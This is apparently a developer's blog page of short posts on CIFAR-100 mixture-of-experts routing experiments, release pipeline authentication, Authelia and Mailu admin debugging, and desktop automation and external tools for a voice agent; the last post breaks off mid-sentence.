BorisovAI

Blog

Posts about the development process, problems solved, and technologies learned along the way

Learning · C--projects-bot-social-publisher

When Perfect Routing Fails: The CIFAR-100 Specialization Paradox

I've just wrapped up Experiment 13b on the **llm-analysis** project, and the results have left me questioning everything I thought I knew about expert networks. The premise was straightforward: could a **deep router with supervised training** finally crack specialized expert networks for CIFAR-100? I'd been chasing this across multiple iterations, watching single-layer routers plateau around 62–63% routing accuracy. So I built something ambitious—a multi-layer routing architecture trained to *explicitly learn* which expert should handle which image class. The numbers looked promising. The deep router achieved **79.5% routing accuracy**—a decisive 1.28× improvement over the baseline. That's the kind of jump that makes you think you've found the breakthrough. I compared it against three other strategies: pure routing, mixed approach, and two-phase training. This one dominated. Then I checked the actual CIFAR-100 accuracy. **73.15%.** A gain of just 0.22 percentage points. Essentially flat. The oracle accuracy—where we *know* the correct expert and route perfectly—hovered around 84.5%. That 11-point gap should have been bridged by better routing. It wasn't. Here's what haunted me: I could prove the router was making *better decisions*. Four out of five times, it selected the right expert. Yet those correct decisions weren't translating into correct classifications. That paradox forced me to confront an uncomfortable truth: **the problem wasn't routing efficiency. The problem was specialization itself.** The expert networks were learning narrow patterns, sure. But on a general-purpose image classification task with 100 fine-grained categories, that specialization came with hidden costs—fewer training examples per expert, reduced generalization, potential overfitting to routing decisions that looked good in isolation but failed downstream. I'd been so focused on optimizing the routing mechanism that I missed the actual bottleneck. A perfectly routed system is useless if the experts themselves can't deliver. The architecture's ceiling was baked in from the start. I updated the documentation, logged the metrics, and stored the final memory state. Experiment 13b delivered the real insight: sometimes the most elegant technical solution isn't the answer your problem actually needs. Now I'm rethinking the whole approach. Maybe the future lies in different architectures entirely—ensemble methods with selective routing rather than hard expert assignment. Or maybe CIFAR-100 just wasn't designed for this kind of specialization. Why do Python programmers wear glasses? Because they can't C. 😄
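For readers who want the shape of the comparison, here is a minimal PyTorch sketch. The hidden-layer sizes and the random "correct expert" labels are illustrative assumptions; only the 128-dimensional features, the four experts, and the supervised routing objective come from these experiment write-ups.

```python
import torch
import torch.nn as nn

FEATURES, NUM_EXPERTS = 128, 4   # from the related CIFAR-100 posts

# Baseline: a single-layer router.
shallow_router = nn.Linear(FEATURES, NUM_EXPERTS)

# Deep router: hidden layers, trained with explicit supervision.
deep_router = nn.Sequential(
    nn.Linear(FEATURES, 256), nn.ReLU(),
    nn.Linear(256, 128), nn.ReLU(),
    nn.Linear(128, NUM_EXPERTS),
)

features = torch.randn(32, FEATURES)                    # batch of backbone features
expert_labels = torch.randint(0, NUM_EXPERTS, (32,))    # "correct expert" per sample

logits = deep_router(features)
routing_loss = nn.functional.cross_entropy(logits, expert_labels)
routing_acc = (logits.argmax(dim=1) == expert_labels).float().mean()
# A higher routing_acc does not guarantee higher end-task accuracy if the
# experts themselves generalize poorly, which is the paradox described above.
```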

Feb 17, 2026
Code Change · llm-analisis

When Perfect Routing Isn't Enough: The CIFAR-100 Specialization Puzzle

I've just wrapped up Experiment 13b on the llm-analysis project, and the results have left me with more questions than answers—in the best way possible. The premise was straightforward: could a **deep router with supervised training** finally crack the code on specialized expert networks? I'd been chasing this idea through multiple iterations, watching single-layer routers plateau around 62–63% accuracy. So I built something more ambitious: a multi-layer routing architecture trained to explicitly learn which expert should handle which image class.

The numbers looked promising at first. The deep router achieved **79.5% routing accuracy**—a decisive 1.28× improvement over the baseline single-layer approach. That's the kind of jump that makes you think you're onto something. I compared it against three other strategies (pure routing, mixed, and two-phase), and this one dominated on the routing front.

Then I checked the actual CIFAR-100 accuracy. **73.15%.** That's a gain of just 0.22 percentage points over the two-phase approach. Essentially flat. The oracle accuracy hovered around 84.5%, leaving an 11-point gap that perfect routing couldn't bridge.

Here's what haunted me: I could demonstrate that the router was making *better decisions*—selecting the right expert 4 out of 5 times. Yet those correct decisions weren't translating into correct classifications. That paradox forced me to confront an uncomfortable truth: the problem wasn't routing efficiency. The problem was that **specialization itself might not be the solution** for CIFAR-100's complexity.

The expert networks were learning narrow patterns, sure. But on a general-purpose image classification task with 100 fine-grained categories, that specialization came with hidden costs—fewer examples per expert, reduced generalization, potential overfitting to routing decisions that looked good in isolation but failed downstream.

I updated the documentation, logged the experiment metrics (routing accuracy, oracle accuracy, the works), and stored the final memory state. The 12b-fix variant and 13a experiments filled in the picture, but 13b delivered the real insight: sometimes the most elegant technical solution isn't the answer your problem actually needs. Now I'm rethinking the whole approach. Maybe the future lies in different architectures entirely—or maybe ensemble methods with selective routing rather than hard expert assignment.

Why did the router walk into a bar? It had to make a decision about where to go. 😄

Feb 17, 2026
Bug Fix · ai-agents-genkit

CI Authentication for Python Genkit: Three-Tier Release Pipeline

When you're managing a multi-package release pipeline across eight different workflows, authentication becomes your biggest bottleneck. I recently tackled exactly this problem for the **Genkit** project—a scenario that I suspect many monorepo maintainers face. The challenge was straightforward: each release workflow needed a way to authenticate with GitHub, create commits, and trigger downstream CI. But there's a catch. Different authentication methods have different tradeoffs, and not all of them trigger CI on pull requests. We implemented a **three-tier authentication system** that gives teams the flexibility to choose their comfort level. The first tier uses a **GitHub App**—the gold standard. It passes CLA checks automatically, triggers downstream CI without question, and resolves git identity using the app slug. The second tier falls back to **Personal Access Tokens**, which also pass CLA and trigger CI, but require storing a PAT in your repo secrets. The third tier, our safety net, relies on the built-in **GITHUB_TOKEN**—zero setup, zero configuration burden, but with a catch: PRs won't trigger downstream workflows. Here's where it gets interesting. Each mode resolves git identity differently. The App uses `<app-slug>[bot]` with an API-fetched user ID. The PAT and GITHUB_TOKEN both lean on repo variables—`RELEASEKIT_GIT_USER_NAME` and `RELEASEKIT_GIT_USER_EMAIL`—with sensible fallbacks to `releasekit[bot]` or `github-actions[bot]`. This means you can actually pass CLA checks even with a basic GITHUB_TOKEN, as long as you configure those variables to a CLA-signed identity. To make this practical, I added an `auth_method` dropdown to the workflow dispatch UI. Teams can choose between `auto` (the default, which auto-detects from secrets), `app`, `pat`, or `github-token`. This is a small detail, but it transforms the experience from "hope it works" to "I know exactly what I'm doing." The supporting infrastructure involved a standalone **`bootstrap_tags.py`** script—a PEP 723-compatible Python script that reads the `releasekit.toml` file, discovers all workspace packages dynamically, and creates per-package tags at the bootstrap commit. For the Genkit project, that meant pushing 24 tags: 23 per-package tags plus one umbrella tag. Documentation updates rounded out the work. The README now includes setup instructions for all three auth modes, a reference table for the `auth_method` dropdown, and bootstrap tag usage examples. The subtle wins here aren't flashy. It's that teams no longer need a GitHub App or PAT to get started—GITHUB_TOKEN plus a couple of env variables is enough. It's unified identity resolution across all eight workflows, so the automation is consistent. And it's the flexibility to scale up to proper authentication when you're ready. Why did the Python programmer stop responding to release pipeline failures? Because his interpreter was too busy collecting garbage. 😄
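The post doesn't include the script itself, so here is a rough, hypothetical sketch of what a PEP 723-style tagging script could look like. The `releasekit.toml` layout, the `packages` table, the per-package tag format, and the umbrella tag name are all assumptions for illustration; only the file name, the PEP 723 framing, and the "per-package tags plus umbrella tag" idea come from the post.

```python
# /// script
# requires-python = ">=3.11"
# ///
"""Sketch of a bootstrap tagging script (hypothetical config layout)."""
import subprocess
import tomllib

BOOTSTRAP_COMMIT = "HEAD"  # assumption: tag the current commit

with open("releasekit.toml", "rb") as f:
    config = tomllib.load(f)

# Assumption: workspace packages live under a "packages" table.
packages = config.get("packages", {})

for name, meta in packages.items():
    version = meta.get("version", "0.0.0")
    tag = f"{name}-v{version}"  # hypothetical per-package tag format
    subprocess.run(["git", "tag", tag, BOOTSTRAP_COMMIT], check=True)

# One umbrella tag on top of the per-package tags.
subprocess.run(["git", "tag", "bootstrap", BOOTSTRAP_COMMIT], check=True)
```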

Feb 17, 2026
New Feature · C--projects-bot-social-publisher

Why Your AI Blog Notes Have Broken Images—And How I Fixed It

I was reviewing our **bot-social-publisher** pipeline last week when something obvious suddenly hit me: most of our published notes were showing broken image placeholders. The enrichment system was supposed to grab visuals for every post, but somewhere between generation and publication, the images were vanishing. The culprit? **Unsplash integration timing and fallback logic**. Here's what was happening: when we generated a note about machine learning or DevOps, the enrichment pipeline would fire off an image fetch request to Unsplash based on the extracted topic. But the request was happening *inside* a tight 60-second timeout window—the same window that also handled Claude CLI calls, Wikipedia fetches, and joke generation. When the Claude call took longer than expected (which happened roughly 40% of the time), the image fetch would get starved and drop silently. Even worse, our fallback mechanism—a Pillow-based placeholder generator—wasn't being triggered properly. The code was checking for `None` responses, but the actual failure mode was a malformed URL object that never made it into the database. **The fix came in three parts:** First, I decoupled image fetching from the main enrichment timeout. Images now run on their own 15-second budget, independent of content generation. If Unsplash times out, we immediately fall back to a generated placeholder rather than waiting around. Second, I hardened the fallback logic. The Pillow generator now explicitly validates the image before storing it, and the database layer catches any malformed entries before they hit the publisher. Third—and this was the sneaky one—I fixed a bug in the Strapi API integration. When we published to the site, we were mapping the image URL into a field that expected a **full media object**, not just a string. The API would silently accept the request but ignore the image field. A couple of hours digging through API logs revealed that our `fullDescription` was getting published, but the `image` relation wasn't being created. Speaking of relationships—a database administrator once left his wife because she had way too many one-to-many relationships. 😄 The result? Image presence went from 32% to 94% across new notes. Not perfect—some tech topics still don't have great Unsplash coverage—but now when images *should* be there, they actually are. Sometimes the most impactful fixes aren't architectural breakthroughs. They're just careful debugging: trace the data, find where it's dropping, and make sure the fallback actually works.
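A condensed sketch of the decoupling described above, assuming an async Unsplash client is passed in. Only the 15-second budget comes from the post; the function names, placeholder dimensions, and colors are illustrative.

```python
import asyncio
import io

from PIL import Image, ImageDraw

IMAGE_TIMEOUT = 15  # seconds, independent of the content-generation timeout


def placeholder_image(topic: str) -> bytes:
    """Pillow-based fallback: a simple labelled placeholder card."""
    img = Image.new("RGB", (1200, 630), color=(30, 41, 59))
    ImageDraw.Draw(img).text((40, 40), topic, fill=(226, 232, 240))
    buf = io.BytesIO()
    img.save(buf, format="PNG")
    return buf.getvalue()


async def get_note_image(topic: str, fetch_unsplash_image) -> bytes:
    """Run the Unsplash fetch on its own budget; fall back immediately on failure."""
    try:
        image = await asyncio.wait_for(fetch_unsplash_image(topic), IMAGE_TIMEOUT)
        if not image:  # treat empty or None responses as failures too
            raise ValueError("empty Unsplash response")
        return image
    except (asyncio.TimeoutError, ValueError):
        return placeholder_image(topic)
```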

Feb 17, 2026
New Feature · C--projects-bot-social-publisher

Routing Experts on CIFAR-100: When Specialization Meets Reality

I've spent three weeks chasing a frustrating paradox in mixture-of-experts (MoE) architecture. The **oracle router**—theoretically perfect—achieves **80.78% accuracy** on CIFAR-100. My learned router? **72.93%**. A 7.85-point gap that shouldn't exist. The architecture works. The routing just refuses to learn.

## The BatchNorm Ambush

Phase 12 started with hot-plugging: freeze one expert, train its replacement, swap it back. The first expert's accuracy collapsed by **2.48 percentage points**. I dug through code for hours, assuming it was inevitable drift. Then I realized the trap: **BatchNorm updates its running statistics even with frozen weights**. When I trained other experts, the shared backbone's BatchNorm saw new data, recalibrated, and silently corrupted the frozen expert's inference. The fix was embarrassingly simple—call `eval()` explicitly on the backbone after `train()` triggers. Drift dropped to **0.00pp**. Half a day wasted on an engineering detail, but at least this problem *had* a solution.

## The Routing Ceiling

Phase 13 was the reckoning. I'd validated the architecture through pruning cycles—80% sparsity, repeated regrow iterations, stable accuracy accumulation. The infrastructure was solid. So I tried three strategies to close the expert gap:

**Strategy A**: Replace the single-layer `nn.Linear(128, 4)` router with a deep network. One layer seemed too simplistic. Result: **73.32%**. Marginal. The router architecture wasn't the bottleneck.

**Strategy B**: Joint training—unfreeze experts while training the router, let them co-evolve. I got **73.74%**, still well below the oracle. Routing accuracy plateaued at **62.5%** across all variants. Hard ceiling.

**Strategy C**: Deeper architecture plus joint training. Same 62.5% routing accuracy. No improvement.

The routing matrix told the truth I didn't want to hear: **CIFAR-100's 100 classes don't naturally partition into four specialized domains**. Each expert stream sees data from all 100 classes. Gradients come from everywhere. Domain specificity dissolves. The router can't learn separation because the experts never truly specialize.

## The Lesson

This isn't about router depth or training strategy. It's architectural. You can't demand specialization when every expert sees the same data distribution. The oracle works *mathematically*—it knows the optimal partition. But learning that partition from scratch when the data doesn't support it? That's asking the model to do magic.

Phase 12 taught me to debug carefully. Phase 13 taught me to read the data. The solution isn't a better router. It's either a dataset with actual domain structure, or acceptance that on CIFAR-100, this pattern doesn't scale.

**Fun fact**: Apparently, changing random things until code works is "hacky" and "bad practice," but do it fast enough, call it "Machine Learning," and suddenly it's worth 4x your salary. 😄
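The BatchNorm pitfall is easy to reproduce in isolation. In this minimal sketch (toy backbone, random data), the weights are frozen with `requires_grad_(False)`, yet a forward pass in training mode still shifts the running statistics; switching the module to `eval()` is what actually freezes them.

```python
import torch
import torch.nn as nn

backbone = nn.Sequential(nn.Conv2d(3, 16, 3, padding=1), nn.BatchNorm2d(16), nn.ReLU())

# "Freezing" the weights only stops gradient updates.
for p in backbone.parameters():
    p.requires_grad_(False)

bn = backbone[1]

before = bn.running_mean.clone()
backbone.train()                              # training mode: running stats still update
backbone(torch.randn(8, 3, 32, 32))
print(torch.allclose(before, bn.running_mean))   # False, silent drift

before = bn.running_mean.clone()
backbone.eval()                               # eval mode freezes running statistics too
backbone(torch.randn(8, 3, 32, 32))
print(torch.allclose(before, bn.running_mean))   # True, 0.00pp drift
```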

Feb 17, 2026
Bug Fix · llm-analisis

Routing Experts on CIFAR-100: Why Specialization Doesn't Scale

I've been chasing a frustrating paradox for three weeks. The **oracle router**—hypothetically perfect—achieves **80.78% accuracy** on CIFAR-100 using a mixture-of-experts architecture. Yet my learned router plateaus at **72.93%**, leaving a **7.85 percentage point gap** that shouldn't exist. The architecture *works*. The routing just... doesn't learn.

## The Experiments That Broke Everything

Phase 12 brought clarity, albeit painful. First, I discovered that **BatchNorm running statistics update even with frozen weights**. When hot-plugging new experts during training, their BatchNorm layers drifted by 2.48pp—silently corrupting the model. The fix was surgical: explicitly call `eval()` on the backbone after `train()` triggers. Zero drift. Problem solved. But the routing problem persisted.

Then came the stress test. I cycled through three **prune-regrow iterations**—each pruning to 80% sparsity, training for 20 epochs masked, then regrowing and fine-tuning for 40 epochs. Accuracy improved cumulatively across cycles rather than degrading. The architecture was genuinely stable. That wasn't the bottleneck.

## The Fundamental Ceiling

Phase 13 was the reckoning. I tried three strategies:

**Strategy A**: Replaced the single-layer `nn.Linear(128, 4)` router with a deep neural network. Reasoning: a one-layer router is too simplistic to capture domain complexity. Result: **73.32%**. Marginal gain. The router architecture wasn't the constraint.

**Strategy B**: Joint training—unfreezing experts while training the router. Maybe they need to co-evolve? The model hit **73.74%**, still well below the oracle's 80.78%. Routing accuracy plateaued around **62.5%** across all variants, a hard ceiling.

**Strategy C**: Deeper architecture + joint training. Same 62.5% routing ceiling.

The routing matrix revealed the culprit: CIFAR-100's 100 classes don't naturally partition into four specialized domains when trained jointly. The gradients from all classes cross-contaminate expert specialization. You either get specialization *or* routing accuracy—not both.

## The Punchline

Sometimes the oracle gap isn't a bug in your implementation—it's a theorem in disguise. The **7.85pp gap is real and architectural**, not a tuning problem. You can't train a router to route what doesn't exist: genuine specialization under joint gradient pressure.

Here's where I land: **Phase 12b's BatchNorm fix is production-ready**, solving hot-plug stability. Phase 13 taught me that mixture-of-experts on CIFAR-100 has a hard ceiling around 74%, not 80.78%. The oracle gap measures the distance between what's theoretically possible and what's learnable—a useful diagnostic.

A programmer puts two glasses on his bedside table before sleep: one full, one empty. One for thirst, one for optimism. 😄
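For context on the prune-regrow cycle mentioned above, here is a bare-bones sketch of one iteration using magnitude pruning on a single toy layer. The 80% sparsity figure comes from the post; the manual masking (rather than `torch.nn.utils.prune`) and the layer shape are illustrative.

```python
import torch
import torch.nn as nn

layer = nn.Linear(128, 128)
SPARSITY = 0.80  # from the post: prune to 80% sparsity

# Prune: zero out the smallest 80% of weights by magnitude.
with torch.no_grad():
    threshold = torch.quantile(layer.weight.abs().flatten(), SPARSITY)
    mask = (layer.weight.abs() > threshold).float()
    layer.weight.mul_(mask)

def apply_mask_after_step():
    # Called after each optimizer step during the masked training epochs,
    # so pruned weights stay at zero.
    with torch.no_grad():
        layer.weight.mul_(mask)

# Regrow: drop the mask and fine-tune the full dense layer again.
mask = torch.ones_like(layer.weight)
```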

Feb 17, 2026
Bug Fix · ai-agents-genkit

How Force Pushes Saved Our Release Pipeline

When you're building a CI/CD system, you learn quickly that **release automation is deceptively fragile**. We discovered this the hard way with `releasekit-uv.yml` — our release orchestrator for the ai-agents-genkit project kept failing when trying to create consecutive release PRs.

The problem seemed simple at first: the `prepare_release()` function was recreating the release branch from scratch on each run using `git checkout -B`, which essentially resets the branch to the current HEAD. This is by design — we want a clean slate for each release attempt. But here's where it got tricky: when the remote repository already had that branch from a previous run, Git would reject our push as non-fast-forward. The local branch and remote branch had diverged, and Git wasn't going to let us overwrite the remote without explicit permission.

**The fix was deceptively elegant.** We added a `force` parameter to our VCS abstraction layer's `push()` method. Rather than using the nuclear option of `--force`, we implemented `--force-with-lease`, which is the safer cousin — it fails if the remote has unexpected changes we don't know about. This keeps us from accidentally clobbering work we didn't anticipate.

This change rippled through our codebase in interesting ways. Our Git backend in `git.py` now handles the force flag, our Mercurial backend got the parameter for protocol compatibility, and we had to update seven different test files to match the new VCS protocol signature. That last part is a good reminder that **abstractions have a cost** — but they're worth it when you need to support multiple version control systems.

We also tightened our error handling in `cli.py`, catching `RuntimeError` and `Exception` from the prepare stage and logging structured events instead of raw tracebacks. When something goes wrong in GitHub Actions, you want visibility immediately — not buried in logs. So we made sure the last 50 lines of output print outside the collapsed group block. While we were in there, I refactored the `setup.sh` script to replace an O(M×N) grep-in-loop pattern with associative arrays — a tiny optimization, but when you're checking which Ollama models are already pulled on every CI run, every millisecond counts.

**The real lesson here** wasn't just about force pushes or VCS abstractions. It was that release automation demands thinking through failure modes upfront: What happens when this runs twice? What if the network hiccups mid-push? What error messages will actually help developers debug at 2 AM? Getting release infrastructure right means fewer surprises in production. And honestly, that's worth the extra engineering overhead.

---

*Why do programmers prefer dark mode? Because light attracts bugs.* 😄
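A sketch of what the new `force` parameter might look like on the Git side. The `push()` name matches the post, but the class shape, argument order, and branch name are assumptions.

```python
import subprocess

class GitBackend:
    """Minimal sketch of a Git backend with an opt-in force push."""

    def push(self, remote: str, branch: str, force: bool = False) -> None:
        cmd = ["git", "push", remote, branch]
        if force:
            # --force-with-lease refuses to overwrite remote changes we have
            # not seen locally, unlike a plain --force.
            cmd.insert(2, "--force-with-lease")
        subprocess.run(cmd, check=True)

# Re-creating the release branch with `git checkout -B` and pushing it again:
# GitBackend().push("origin", "release/next", force=True)
```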

Feb 17, 2026
Learning · C--projects-ai-agents-voice-agent

Scaling AI Agent Documentation: From Three Tiers to Four

When you're building an autonomous voice agent that orchestrates multiple tools—UI automation, API calls, local computation—your architecture docs become just as critical as the code itself. Recently, I faced exactly this challenge: our **voice-agent** project had evolved beyond its original design, and the documentation was starting to lag behind reality. The catalyst came from adding **CUA (UI-TARS VLM)** for visual understanding alongside desktop automation. Suddenly, we weren't just calling APIs anymore. We had agents controlling Windows UI, processing screenshots through vision models, and managing complex tool chains. The old three-tier capability model—Web APIs, CLI tools, and code execution—didn't capture this anymore. Here's what we discovered while refactoring: **local package integration** deserved its own tier. We created Tier 4 to explicitly acknowledge dependencies like `cua`, `pyautogui`, and custom wrappers that agents load via `pip install`. This wasn't just semantic—it changed how we think about dependency management. Web APIs live on someone else's infrastructure. CLI tools are system-wide. But local packages? Those ship *with* your agent, versioned and cached. That distinction matters when you're deploying across different machines. The real work came in the desktop automation tree. We'd added three new GUI tools—`desktop_drag`, `desktop_scroll`, `desktop_wait`—that weren't documented. Meanwhile, our old OCR strategy via Tesseract felt clunky compared to CUA's vision-based approach. So we ripped out the Tesseract section and rewrote it around UI-TARS, which uses actual visual understanding instead of brittle text parsing. One decision I wrestled with: should Phase 3 (our most ambitious phase) target 12 tools or 21? The answer came from counting what we'd actually built. Twenty-one tools across FastAPI routes, AgentCore methods, and desktop automation—that was our reality. Keeping old numbers would've confused the team about what was actually complete. I also realized we'd scattered completion markers throughout the docs—"(NEW)" labels, "(3.1–3.9) complete" scattered across files. Consolidating these into a single task list with checkmarks made the project status transparent at a glance. **The lesson:** Architecture documentation isn't overhead—it's your agent's brain blueprint. When your system grows from "call this API" to "understand the screen, move the mouse, run the script, then report back," that complexity *must* live in your docs. Otherwise, your team spends cycles re-discovering decisions you've already made. Tools evolved. Documentation caught up. Both are now in sync.

Feb 16, 2026
New Feature · borisovai-admin

Building an Admin Dashboard for Authelia: Debugging User Disabled States and SMTP Configuration Hell

I was tasked with adding a proper admin UI to **Authelia** for managing users—sounds straightforward until you hit the permission layers. The project is `borisovai-admin`, running on the `main` branch with Claude AI assist, and it quickly taught me why authentication middleware chains are nobody's idea of fun.

The first clue that something was wrong came when a user couldn't log in through proxy auth, even though credentials looked correct. I dug into the **Mailu** database and found it: the account was *disabled*. Authelia's proxy authentication mechanism won't accept a disabled user, period. Flask CLI was hanging during investigation, so I bypassed it entirely and queried **SQLite** directly to flip the `enabled` flag. One SQL query, one enabled user, one working login. Sometimes the simplest problems hide behind the most frustrating debugging sessions.

Building the admin dashboard meant creating CRUD endpoints in **Node.js/Express** and a corresponding HTML interface. I needed to surface mailbox information alongside user credentials, which meant parsing Mailu's account data and displaying it alongside Authelia's user metadata. The challenge wasn't the database queries—it was the **middleware chain**. Traefik routing sits between the user and the app, and I had to inject a custom `ForwardAuth` endpoint that validates against Mailu's account state, not just Authelia's token.

Then came the SMTP notifier configuration. Authelia wants to send notifications, but the initial setup had `disable_startup_check: false` nested under `notifier.smtp`, which caused a crash loop. Moving it to the top level of the notifier block fixed the crash, but Docker networking added another layer: I couldn't reach Mailu's SMTP from localhost on port 587 because Mailu's front-end expects external TLS connections. The solution was routing through the internal Docker network directly to the postfix service on port 25.

The middleware ordering in Traefik was another gotcha. Authentication middleware (`authelia@file`, `mailu-auth`) has to run *before* header-injection middleware, or you'll get 500 errors on every request. I restructured the middleware chain in `configure-traefik.sh` to enforce this ordering, which finally let the UI render without internal server errors.

By the end, the admin dashboard could create users, edit their mailbox assignments, and display their authentication status—all protected by a two-stage auth process through both Authelia and Mailu. The key lesson: **distributed auth is hard**, but SQLite queries beat CLI timeouts, and middleware order matters more than you'd think.

---

Today I learned that changing random stuff until your program works is called "hacky" and "bad practice"—but if you do it fast enough, it's "Machine Learning" and pays 4× your salary. 😄
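Bypassing the hanging Flask CLI and flipping the flag straight in SQLite looked roughly like this sketch. The database path, table, and column names are placeholders, since Mailu's actual schema isn't quoted in the post.

```python
import sqlite3

# Hypothetical path, table, and column names: adjust to the real Mailu schema.
conn = sqlite3.connect("/data/mailu/main.db")
conn.execute(
    "UPDATE user SET enabled = 1 WHERE email = ?",
    ("user@example.com",),
)
conn.commit()
conn.close()
```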

Feb 16, 2026
New Feature · C--projects-ai-agents-voice-agent

Building a Unified Desktop Automation Layer: From Browser Tools to CUA

I just completed a significant phase in our AI agent project — transitioning from isolated browser automation to a **comprehensive desktop control system**. Here's how we pulled it off.

## The Challenge

Our voice agent needed more than just web browsing. We required **desktop GUI automation**, clipboard access, process management, and — most ambitiously — **Computer Use Agent (CUA)** capabilities that let Claude itself drive the entire desktop. The catch? We couldn't repeat the messy patterns from browser tools across 17+ desktop utilities.

## The Pattern Emerges

I started by creating a `BrowserManager` singleton wrapping Playwright, then built 11 specialized tools (navigate, screenshot, click, fill form) around it. Each tool followed a strict interface: `@property name`, `@property schema` (full Claude-compatible JSON), and `async def execute(inputs: dict)`. No shortcuts, no inconsistencies.

This pattern proved bulletproof. I replicated it for **desktop tools**: `DesktopClickTool`, `DesktopTypeTool`, window management, OCR, and process control. The key insight was *infrastructure first*: a `ToolRegistry` with approval tiers (SAFE, RISKY, RESTRICTED) meant we could gate dangerous operations like shell execution without tangling business logic.

## The CUA Gamble

Then came the ambitious part. Instead of Claude calling tools individually, what if Claude could *see* the screen and decide its next move autonomously? We built a **CUA action model** — a structured parser that translates Claude's natural language into `click(x, y)`, `type("text")`, `key(hotkey)` primitives. The `CUAExecutor` runs these actions in a loop, taking screenshots after each move, feeding them back to Claude's vision API.

The technical debt? **Thread safety**. Multiple CUA sessions competing for mouse/keyboard. We added `asyncio.Lock()` — simple, but critical. And no kill switch initially — we needed an `asyncio.Event` to emergency-stop runaway loops.

## The Testing Gauntlet

We went all-in: **51 tests** for desktop tools (schema validation, approval gating, fallback handling), **24 tests** for CUA action parsing, **19 tests** for the executor, **12 tests** for vision API mocking, and **8 tests** for the agent loop. Pre-existing ruff lint issues forced careful triage — we fixed only what *we* broke. By the end: **856 tests pass**. The desktop automation layer is production-ready.

## Why It Matters

This isn't just about clicking buttons. It's about giving AI agents **agency without API keys**. Every desktop application becomes accessible — not via SDK, but via vision and action primitives. It's the difference between a chatbot and an *agent*. Self-taught developers often stumble at this junction — no blueprint for multi-tool coordination. But patterns, once found, scale beautifully. 😄
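The tool interface described above maps to something like this sketch. Only the `name`/`schema`/`execute` shape and the `DesktopClickTool` name come from the post; the base class, schema fields, and the pyautogui mention are assumptions.

```python
from abc import ABC, abstractmethod

class Tool(ABC):
    """Minimal sketch of the shared tool interface."""

    @property
    @abstractmethod
    def name(self) -> str: ...

    @property
    @abstractmethod
    def schema(self) -> dict: ...

    @abstractmethod
    async def execute(self, inputs: dict) -> dict: ...


class DesktopClickTool(Tool):
    @property
    def name(self) -> str:
        return "desktop_click"

    @property
    def schema(self) -> dict:
        # Claude-compatible JSON schema describing the tool's inputs.
        return {
            "type": "object",
            "properties": {
                "x": {"type": "integer"},
                "y": {"type": "integer"},
            },
            "required": ["x", "y"],
        }

    async def execute(self, inputs: dict) -> dict:
        # A real implementation would drive the mouse (e.g. via pyautogui).
        return {"clicked": [inputs["x"], inputs["y"]]}
```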

Feb 16, 2026
Bug Fix · trend-analisis

Untangling Years of Technical Debt in Trend Analysis

Sometimes the best code you write is the code you delete. This week, I spent the afternoon going through the `trend-analysis` project—a sprawling signal detection system—and realized we'd accumulated a graveyard of obsolete patterns, ghost queries, and copy-pasted logic that had to go.

The cleanup started with the adapters. We had three duplicate files—`tech.py`, `academic.py`, and `marketplace.py`—that existed purely as middlemen, forwarding requests to the *actual* implementations: `hacker_news.py`, `github.py`, `arxiv.py`. Over a thousand lines of code, gone. Each adapter was just wrapping the same logic in slightly different syntax. Removing them meant updating imports across the codebase, but the refactor paid for itself instantly in clarity.

Then came the ghost queries. In `api/services/`, there was a function calling `_get_trend_sources_from_db()`—except the `trend_sources` table never existed. Not in schema migrations, nowhere. It was dead code spawned by a half-completed feature from months ago. Deleting it felt like exorcism.

The frontend wasn't innocent either. Unused components like `signal-table`, `impact-zone-card`, and `empty-state` had accumulated—409 lines of JSX nobody needed. More importantly, we'd hardcoded constants like `SOURCE_LABELS` and `CATEGORY_DOT_COLOR` in three different places. I extracted them to `lib/constants.ts` and updated all references. DRY violations are invisible at first, but they compound into maintenance nightmares.

One bug fix surprised me: `credits_store.py` was calling `sqlite3.connect()` directly instead of using our connection pool via `db.connection.get_conn()`. That's a concurrency hazard waiting to happen. Fixing it was two lines, but it prevented a potential data race in production.

There were also lingering dependencies we'd added speculatively—`exa-py`, `pyvis`, `hypothesis`—sitting unused in `requirements.txt`. Comments replaced them in the code, leaving a breadcrumb trail in case we ever need them again.

By the time I finished the test suite updates (fixing endpoint paths like `/trends/job-t/report` → `/analyses/job-t/report`), the codebase felt lighter. Leaner. The kind of cleanup that doesn't add features, but makes the next developer's job easier. Tech debt compounds like interest. The earlier you pay it down, the less principal you owe.

**Why do programmers prefer using dark mode? Because light attracts bugs.** 😄
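The `credits_store.py` fix amounts to routing writes through one shared, pooled connection. A self-contained sketch, with a stand-in for the project's `db.connection.get_conn()` helper and a made-up `credits` table:

```python
import sqlite3
from contextlib import contextmanager

# Stand-in for the project's db.connection.get_conn(): one shared connection
# handed out by a context manager instead of ad-hoc sqlite3.connect() calls.
_shared = sqlite3.connect(":memory:", check_same_thread=False)
_shared.execute(
    "CREATE TABLE IF NOT EXISTS credits (user_id INTEGER PRIMARY KEY, balance INTEGER DEFAULT 0)"
)

@contextmanager
def get_conn():
    yield _shared

def add_credits(user_id: int, amount: int) -> None:
    # Before the fix this opened its own sqlite3.connect(); racing writers on
    # separate connections is exactly the concurrency hazard mentioned above.
    with get_conn() as conn:
        conn.execute("INSERT OR IGNORE INTO credits (user_id) VALUES (?)", (user_id,))
        conn.execute(
            "UPDATE credits SET balance = balance + ? WHERE user_id = ?",
            (amount, user_id),
        )
        conn.commit()
```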

Feb 16, 2026
New Feature · C--projects-ai-agents-voice-agent

Building Phase 1: Integrating 21 External System Tools Into an AI Agent

I just wrapped up Phase 1 of our voice agent project, and it was quite the journey integrating external systems. When we started, the agent could only talk to Claude—now it can reach out to HTTP endpoints, send emails, manage GitHub issues, and ping Slack or Discord. Twenty-one new tools, all working together. The challenge wasn't just adding features; it was doing it *safely*. We built an **HTTP client** that actually blocks SSRF attacks by blacklisting internal IP ranges (localhost, 10.*, 172.16-31.*). When you're giving an AI agent the ability to make arbitrary HTTP requests, that's non-negotiable. We also capped requests at 30 per minute and truncate responses at 1MB—essential guardrails when the agent might get chatty with external APIs. The **email integration** was particularly tricky. We needed to support both IMAP (reading) and SMTP (sending), but email libraries like `aiosmtplib` and `aioimaplib` aren't lightweight. Rather than force every deployment to install email dependencies, we made them optional. The tools gracefully fail with clear error messages if the packages aren't there—no silent breakage. What surprised me was how much security thinking goes into *permission models*. GitHub tools, Slack tokens, Discord webhooks—they all need API credentials. We gated these behind feature flags in the config (`settings.email.enabled`, etc.), so a deployment doesn't accidentally expose integrations it doesn't need. Some tools require **explicit approval** (like sending HTTP requests), while others just notify the user after the fact. The **token validation** piece saved us from subtle bugs. A missing GitHub token doesn't crash the tool; it returns a clean error: "GitHub token not configured." The agent sees that and can adapt its behavior accordingly. Testing was where we really felt the effort. We wrote 32 new tests covering schema 